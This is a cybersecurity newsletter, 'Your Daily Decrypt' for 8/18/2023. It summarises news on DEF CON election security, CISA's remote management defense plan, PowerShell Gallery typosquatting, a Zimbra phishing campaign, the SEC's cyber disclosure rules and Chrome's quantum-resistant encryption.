Your Daily Decrypt

8/18/2023 - Today’s news and insights for cybersecurity pros and leaders

📰 Top Stories 

Summary

Who's Involved: Organizers of DEF CON hacker convention, DARPA, Galois, and security researchers.

What's Happening: DEF CON's 'Voting Village' event focused on enhancing election equipment security and the physical safety of researchers. This year saw the introduction of a $10 million DARPA-funded open-source voting machine designed to resist hacking.

Why It Matters:

  • Election Security: The integrity of voting machines is essential for democratic processes.

  • Physical Safety: The event addressed increased threats to researchers and election officials.

  • Innovation: A new open-source voting machine marks a significant advancement in secure elections.

Why it’s important to you

Stay Informed: Understanding the measures taken to ensure election security and the technology behind it.

Know the Risks: Recognizing the challenges and threats faced by those working to safeguard election integrity.

Embrace Innovation: Appreciating the advancements in technology that contribute to secure and transparent voting processes.

Summary

Who's Involved: U.S. Cybersecurity and Infrastructure Agency (CISA), National Security Agency (NSA), Joint Cyber Defense Collaborative (JCDC), and various RMM (remote monitoring and management) companies.

What's Happening: CISA, in collaboration with other agencies and private companies, published a Cyber Defense Plan for Remote Monitoring and Management. This plan focuses on addressing the security risks associated with RMM tools, which have been increasingly exploited by hackers to bypass security systems.

Why It Matters:

  • Security Risks: Both nation-states and cybercriminals are exploiting RMM software to gain unauthorized access to systems, including federal civilian agencies.

  • Coordinated Effort: The plan emphasizes vulnerability information sharing, industry coordination, end-user education, and advisory amplification.

  • Nation's Infrastructure: The move aims to reduce risks to critical infrastructure and to foster collaboration across the cybersecurity ecosystem.

Why it’s important to you

Stay Informed: If you or your organization relies on RMM tools, be aware of best practices for safeguarding these systems.

Know the Strategy: The plan aligns with broader national cybersecurity strategies and provides a roadmap for enhancing the security and resilience of RMM tools

🚨 Threat Alerts

Summary

What's Happening: Microsoft's PowerShell Gallery is vulnerable to supply chain attacks, including typosquatting, due to weak protections against malicious package uploads, according to researchers at Aqua Nautilus. Despite Microsoft's claim to have addressed the issues, researchers found that the problems persist.

Why It Matters:

  • Typosquatting Risk: The PowerShell Gallery lacks protection against typosquatting, allowing malicious packages with names similar to popular legitimate ones to be uploaded.

  • Owner Identity Spoofing: Attackers can fake package details such as author and description, making malicious packages appear legitimate.

  • Unlisted Modules Exposure: Aqua's analysis found that attackers could find unlisted and private modules, even discovering sensitive secrets in one instance.

  • Common Usage: With over 1.6 billion package downloads this year alone, many organizations rely on PowerShell Gallery for code modules and resources

Why it’s important to you

Use Caution: If you or your organization uses PowerShell modules from the gallery, consider only using signed modules and trusted private repositories.

Stay Informed: Keep an eye on updates and improvements in the PowerShell Gallery's security measures, as the current vulnerabilities could be exploited.

Summary

What's Happening: A phishing campaign targeting Zimbra Collaboration email servers has been underway since at least April 2023. The unknown attackers are using phishing emails that pretend to be from an organization's admin, warning of an imminent email server update and requesting recipients to open an HTML attachment.

How It Works:

  • Deceptive Email: The phishing email informs users about an impending server upgrade and asks them to open an attached HTML file to avoid account deactivation.

  • Fake Login Page: Opening the HTML attachment reveals a fake Zimbra login page, complete with the targeted company's branding.

  • Password Theft: Any passwords entered on the phishing page are sent directly to the attacker's server.

Why It Matters:

  • Widespread Campaign: The campaign has been successful despite its lack of sophistication, with no specific focus on certain organizations or sectors.

  • Previous Attacks: Zimbra Collaboration email servers have previously been exploited by hacking groups for cyber espionage or as initial breach points.

Why it’s important to you

Stay Vigilant: If your organization uses Zimbra Collaboration, be aware of this phishing threat and exercise caution with emails regarding server updates.

Secure Your Systems: Review and implement security measures to detect and prevent phishing attempts.

⚖️ Regulatory Updates

Summary

Who's Behind the New Rules: U.S. Securities and Exchange Commission (SEC).

What They Did: Released final cyber disclosure rules for public companies.

How They Did It: Focused on three main categories: Risk Management and Strategy, Governance, and Incident Reporting.

What's Been Affected: Public companies' obligations to disclose cyber risks, breaches, governance, and incident reporting procedures.

What Actions Were Taken:

  • Risk Management Strategy: Detailed disclosure on the integration of cyber risk management with overall risk management and third-party involvement.

  • Governance: Disclosure of board and management's roles in cyber risk assessment.

  • Incident Reporting: Timely disclosure of material cybersecurity incidents with exceptions for national security and public safety.

Why it’s important to you

Stay Informed: Public companies must be aware of these rules and the need to comply by the specified dates.

Be Proactive: The rules highlight the SEC's focus on transparency regarding cyber risks and underscore the importance of robust cyber risk management practices.

Consider Implications: Non-compliance with these rules can lead to enforcement actions and liability concerns. Public companies should assess and, if necessary, bolster their cyber risk management strategies and ensure proper governance and incident reporting procedures.

👀 Curated Finds

Summary

Who's Behind the Update: Google.

What They Did: Added support for quantum-resistant encryption in Chrome to make web browsing safe from potential quantum computer threats.

How They Did It: Introduced a new hybrid encryption mechanism called X25519Kyber768, which combines X25519 (an elliptic curve algorithm) and Kyber-768 (a quantum-resistant Key Encapsulation Method).

What's Been Affected: Transport Layer Security (TLS) sessions in Chrome, enhancing them with an additional quantum-resistant layer of encryption.

What Actions Were Taken:

  • Implementation: X25519Kyber768 is made available in Chrome 116 and behind a flag in Chrome 115.

  • Quantum Security: The new mechanism is designed to protect against future quantum computer attacks and "Harvest now and decrypt later" threats.

Why it’s important to you

Stay Informed: Understanding the future risks of quantum computers and Google's steps to mitigate those threats is essential for cybersecurity professionals and Chrome users.

Be Proactive: Google's forward-looking approach may inspire other technology companies to adopt quantum-resistant encryption, strengthening overall cybersecurity.

Consider Implications: With quantum computers' serious adoption still a few years away, this update demonstrates Google's commitment to future-proofing Chrome and addressing potential security concerns proactively.

Please let me know if you have any comments or feedback by replying to this email or messaging me on X!

Thank you 🙏
Ali Abidi